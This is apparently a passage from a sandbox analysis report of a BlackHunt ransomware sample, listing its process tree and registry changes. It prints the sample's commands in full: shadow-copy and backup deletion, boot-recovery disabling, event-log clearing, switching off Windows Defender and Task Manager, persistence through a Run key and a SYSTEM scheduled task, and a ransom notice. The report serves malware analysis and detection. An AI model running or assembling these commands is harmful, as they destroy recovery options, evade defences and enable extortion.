b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 33 PID 2028 wrote to memory of 2816 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 33 PID 2028 wrote to memory of 2816 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 33 PID 2028 wrote to memory of 2660 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 138 PID 2028 wrote to memory of 2660 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 138 PID 2028 wrote to memory of 2660 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 138 PID 2028 wrote to memory of 2660 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 138 PID 2028 wrote to memory of 2512 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 136 PID 2028 wrote to memory of 2512 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 136 PID 2028 wrote to memory of 2512 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 136 PID 2028 wrote to memory of 2512 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 136 PID 2684 wrote to memory of 2640 2684 cmd.exe 134 PID 2684 wrote to memory of 2640 2684 cmd.exe 134 PID 2684 wrote to memory of 2640 2684 cmd.exe 134 PID 2028 wrote to memory of 2472 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 133 PID 2028 wrote to memory of 2472 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 133 PID 2028 wrote to memory of 2472 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 133 PID 2028 wrote to memory of 2472 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 133 PID 2608 wrote to memory of 2480 2608 cmd.exe 34 PID 2608 wrote to memory of 2480 2608 cmd.exe 34 PID 2608 wrote to memory of 2480 2608 cmd.exe 34 PID 2028 wrote to memory of 2488 2028 b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe"C:\Users\Admin\AppData\Local\Temp\b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2408
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:960
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1288
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2264
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe" /F2⤵PID:2268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2456
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2536
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2832
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2180
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2716
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2340
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2292
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4168
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe"2⤵
- Deletes itself
PID:1988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3456
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3572
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4160
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4148
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3296
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3992
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1200
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2280
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:580
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1136
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1684
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2964
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2220
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2756
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2096
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b7819413b26e47fb4623bf9dd7b7d67efb27c7a5766ee29e3cbd3b1a7711e3b6.exe" /F1⤵
- Creates scheduled task(s)
PID:2424
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2532
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2388
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵
- Enumerates connected drives
PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1442869522695173780294716983467087135-399544332-1458162096160144429455687586"1⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2820
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2312
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1273282956-1451555462-3424807621248270092-1642638985884159750-250660599-405799512"1⤵PID:2964
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2080885206-1722832230-1140545911586061126209605866112199834651930723045-1946586500"1⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2672
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3148
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3132
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4244
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1328
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:4252
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:4232
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:4300
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:892
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:4200
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:2480
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:3880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3084
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3140
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1804
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:4132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4408
